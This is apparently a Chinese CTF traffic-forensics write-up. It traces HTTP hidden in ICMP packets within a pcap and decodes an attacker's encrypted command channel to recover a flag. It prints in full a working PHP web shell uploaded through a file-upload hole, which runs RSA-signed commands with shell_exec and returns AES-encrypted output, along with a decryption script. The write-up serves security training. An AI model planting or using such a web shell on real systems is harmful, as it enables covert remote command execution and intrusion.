Wireshark打开temp.pcap流量包,发现有很多ICMP协议包。
一些ICMP数据包较大,且可发现,明显在传输HTTP协议数据内容:
右键,【显示分组字节】,进一步分析这些HTTP数据:
GET /test.html HTTP/1.1
Host: 192.168.11.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9
Upgrade-Insecure-Requests: 1
If-Modified-Since: Tue, 19 Oct 2021 02:52:56 GMT
If-None-Match: "110-5ceabc236d07e-gzip"
其中, 【Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9】是一个路径: O:9:“PageModel”:1:{s:4:“file”;s:15:“/www/index.html”;} 。
继续看其他ICMP包(43676、43680),发现以下HTTP数据比较可疑:
POST /upload.php HTTP/1.1
Host: 192.168.11.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------202049257429575872453803494412
Content-Length: 1812
Origin: http://192.168.11.1
Connection: keep-alive
Referer: http://192.168.11.1/test.html
Cookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9
Upgrade-Insecure-Requests: 1
-----------------------------202049257429575872453803494412
Content-Disposition: form-data; name="fileToUpload"; filename="message.php"
Content-Type: application/x-php
<?php
define('AES_256_ECB', 'aes-256-ecb');
if(!isset($_REQUEST['pub']))
die("403 Forbiden");
if(!isset($_REQUEST['maybe_key']))
die("403 Forbiden");
$publicKeyString = <<<PK
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6YEBA42r+mPDGi1JTSK9
3yszPBPEzj4D+hlamCt/RCelQgnOptkfpziGZ6J466N7/Y9N4iuNI6oPiohZXFmM
H4CAfdqRI0B7kIlB6UFBoZPTxUgIQof1aaNcu7u0a6Rd2YGtREEAWqQri2mpGikq
g8B3k75fFOGaxfV3HL07lwko15mbgyZdtGZwof3Bepp8DdkfmSEp3wygMy1Tygk7
sI4g1AA/7l+2VIEw/zrwSo5maG98CcKoTmMygBUeVOCB+YkGti4UBYUOcOCkWrBR
YSsCZNiSGuSwMkSw80RWPmMeTV7Zqzln6ho9LFkCnXyQ77yTNJJpA6J8O1MW/+j1
AwIDAQAB
-----END PUBLIC KEY-----
PK;
$publicKey = openssl_pkey_get_public(array($publicKeyString,$privateKeyPassphrase));
if (!$publicKey) {
echo "Public key NOT OK\n";
}
$encryptedWithPrivate = base64_decode($_GET['pub']);
$encryption_key_temp = base64_decode($_GET['maybe_key']);
if (!openssl_public_decrypt($encryptedWithPrivate, $decryptedWithPublicFromPrivate, $publicKey,OPENSSL_PKCS1_PADDING)) {
echo "Error decrypting with public key what was encrypted with private key\n";
}
if (!openssl_public_decrypt($encryption_key_temp, $encryption_key, $publicKey,OPENSSL_PKCS1_PADDING)) {
echo "Error decrypting with public key what was encrypted with private key\n";
}
$cmd_output = shell_exec($decryptedWithPublicFromPrivate);
$encrypted = openssl_encrypt($cmd_output, AES_256_ECB, $encryption_key, 0);
echo $encrypted."\n";
-----------------------------202049257429575872453803494412
Content-Disposition: form-data; name="submit"
Upload Image
-----------------------------202049257429575872453803494412--
很明显,这里利用文件上传漏洞,上传了一个message.php文件,该文件有以下功能:
[1] 接收2个参数: pub, maybe_key
[2] 解析RSA公钥
[3] 获取私钥
[4] shell_exec可以执行命令
[5] 将命令执行结果进行加密,并echo输出
在第82638个包中,发现提交了pub、maybe_key两个参数:
pub=tk3u9WK94x7LxdaowKMfiQwvFuoaxyQAaqXJ1A0yq3XPucT6xWqqsr0uiI/44/GrUeOmCYUZpRlpeeXNTjHFC7igOCEeWNCiyfyMQlOxYa1LHI3PrBe2IM/QA7e/onnVx18yGwO8GQhip0puGSe6/R2jmTlJLUINjI3iQlU9P+AEmJtMS8AaboYD+92vn/vjJ1hrZ8KeQz5bRlmM5YJ5P1tyQUUIv1TC+DTjvKKlxVJw1QWXD4J4AKnaMmP1ABmpKmGV2R8IPGyTyv7+1d7avOyPJWcnd/MLNLBLMvf4qgEVWABBT55F4n0vJt95+u3IUUF4ddFFq5vOUufFzjkCXA==
maybe_key=1OMeS6Nr/ncQOwvLezwrWkIumP2P17ZZFuN7UEeLjAU8uXw+XAfpFaUxMOmYfABrjTCsHhFhTrw8vEzmYgncN/d5kX+B7nzCZ3c6NuhRYvAoPZVqio3r1rs9N1pz4iIJQHJhyfOZIFYcuwY3wo8D8uJvpT6pfrXMewZZ1pjj8pnsU1oz3oW/09Xbf+WCNzOsNLGreFbxecMoS6CRb+MJLI+p9iDIgn5czfHWLS2iFRq64nl2gXIn4HrkaFk4i8bRVVO6ZNia5G5reTVKJfG+nSR7RSlEpe9ovZ0m+GB4+6ms1H7xnIOZMZ01jQPX5Ye9hlimZYZV1SZ31eM3eH3lzQ==
将此代入上面的PHP脚本,运行后,发现shell_exec执行的命令为: cat /flag
<?php
define('AES_256_ECB', 'aes-256-ecb');
$publicKeyString = "
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6YEBA42r+mPDGi1JTSK9
3yszPBPEzj4D+hlamCt/RCelQgnOptkfpziGZ6J466N7/Y9N4iuNI6oPiohZXFmM
H4CAfdqRI0B7kIlB6UFBoZPTxUgIQof1aaNcu7u0a6Rd2YGtREEAWqQri2mpGikq
g8B3k75fFOGaxfV3HL07lwko15mbgyZdtGZwof3Bepp8DdkfmSEp3wygMy1Tygk7
sI4g1AA/7l+2VIEw/zrwSo5maG98CcKoTmMygBUeVOCB+YkGti4UBYUOcOCkWrBR
YSsCZNiSGuSwMkSw80RWPmMeTV7Zqzln6ho9LFkCnXyQ77yTNJJpA6J8O1MW/+j1
AwIDAQAB
-----END PUBLIC KEY-----
";
$publicKey = openssl_pkey_get_public(array($publicKeyString,$privateKeyPassphrase));
if (!$publicKey) {
echo "Public key NOT OK\n";
}
$pub = "tk3u9WK94x7LxdaowKMfiQwvFuoaxyQAaqXJ1A0yq3XPucT6xWqqsr0uiI/44/GrUeOmCYUZpRlpeeXNTjHFC7igOCEeWNCiyfyMQlOxYa1LHI3PrBe2IM/QA7e/onnVx18yGwO8GQhip0puGSe6/R2jmTlJLUINjI3iQlU9P+AEmJtMS8AaboYD+92vn/vjJ1hrZ8KeQz5bRlmM5YJ5P1tyQUUIv1TC+DTjvKKlxVJw1QWXD4J4AKnaMmP1ABmpKmGV2R8IPGyTyv7+1d7avOyPJWcnd/MLNLBLMvf4qgEVWABBT55F4n0vJt95+u3IUUF4ddFFq5vOUufFzjkCXA==";
$may = "1OMeS6Nr/ncQOwvLezwrWkIumP2P17ZZFuN7UEeLjAU8uXw+XAfpFaUxMOmYfABrjTCsHhFhTrw8vEzmYgncN/d5kX+B7nzCZ3c6NuhRYvAoPZVqio3r1rs9N1pz4iIJQHJhyfOZIFYcuwY3wo8D8uJvpT6pfrXMewZZ1pjj8pnsU1oz3oW/09Xbf+WCNzOsNLGreFbxecMoS6CRb+MJLI+p9iDIgn5czfHWLS2iFRq64nl2gXIn4HrkaFk4i8bRVVO6ZNia5G5reTVKJfG+nSR7RSlEpe9ovZ0m+GB4+6ms1H7xnIOZMZ01jQPX5Ye9hlimZYZV1SZ31eM3eH3lzQ==";
$encryptedWithPrivate = base64_decode($pub);
$encryption_key_temp = base64_decode($may);
if (!openssl_public_decrypt($encryptedWithPrivate, $decryptedWithPublicFromPrivate, $publicKey,OPENSSL_PKCS1_PADDING)) {
echo "Error decrypting with public key what was encrypted with private key\n";
}
if (!openssl_public_decrypt($encryption_key_temp, $encryption_key, $publicKey,OPENSSL_PKCS1_PADDING)) {
echo "Error decrypting with public key what was encrypted with private key\n";
}
var_dump($decryptedWithPublicFromPrivate);
$cmd_output = shell_exec($decryptedWithPublicFromPrivate);
var_dump($cmd_output); # cat /flag
$encrypted = openssl_encrypt($cmd_output, AES_256_ECB, $encryption_key, 0);
echo $encrypted."\n";
$aaa = "NoVE76T3Eet+Jp1yEfwCp/RE5iFmpR5o8I+rc7VABou6hxTwiyvn9ihSWX8WTsXC";
$bbb = openssl_decrypt($aaa, AES_256_ECB, $encryption_key, 0);
var_dump($bbb); # flag{9657096501b3077fbae7c6d0de1eb16f}
在后续的第82646个ICMP包中,发现了echo回显的flag。该flag也是被AES加密了的:
NoVE76T3Eet+Jp1yEfwCp/RE5iFmpR5o8I+rc7VABou6hxTwiyvn9ihSWX8WTsXC
将此代入上面的脚本中,进行AES解密,得到flag:
flag{9657096501b3077fbae7c6d0de1eb16f}
